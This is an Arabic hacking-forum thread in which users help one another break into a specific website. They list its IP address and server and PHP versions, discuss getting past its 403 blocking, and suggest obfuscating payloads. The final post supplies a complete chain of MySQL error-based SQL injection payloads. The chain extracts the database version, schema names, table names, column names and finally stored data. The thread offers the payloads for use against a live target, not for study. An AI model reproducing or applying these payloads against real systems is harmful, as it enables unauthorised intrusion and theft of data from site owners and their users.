![]() | رقم المشاركة : 1 (permalink) |
![]() ارجو المساعدة في تخطي الفوربدن للموقع التالي Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC hv[, hglshu]m td jo'd hgt,vf]k ggl,ru hgjhgd | |
| ![]() |
![]() | |||||||||||||||||||||||
المشكلة تكمن فى ان الموقع يسمح بقراءة البيانات او تطبيق الاوامر مرة واحد فعند عمل استدعاء مرة اخرى لاى امريعطى فوربدن Host IP: 203.34.122.129 Web Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Powered-by: PHP/5.2.6-1+lenny16 MySQL جرب دورة الاخ عبد الصمد فى الحقن المتقدم |
![]() | رقم المشاركة : 2 (permalink) | |||||||||||||||||||||||||
![]()
المشكلة تكمن فى ان الموقع يسمح بقراءة البيانات او تطبيق الاوامر مرة واحد فعند عمل استدعاء مرة اخرى لاى امريعطى فوربدن Host IP: 203.34.122.129 Web Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g Powered-by: PHP/5.2.6-1+lenny16 MySQL جرب دورة الاخ عبد الصمد فى الحقن المتقدم
| ||||||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 3 (permalink) | ||
![]() حاول تتلاعب بالاكواد وراح تعمل ليست هناك طريقة محددة لكن ممكن تشفر الكود باستخدام برنامج coder او جرب بعض من الاكواد التالية and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************** ************************************************** ************************************************** ****************** and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ****************************************** and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ********* ***************************************** and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ******************** and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ************************************************** ************** and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ************************************************** ************ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ************************************************** ****************** and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ************************************************** ***************************************
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|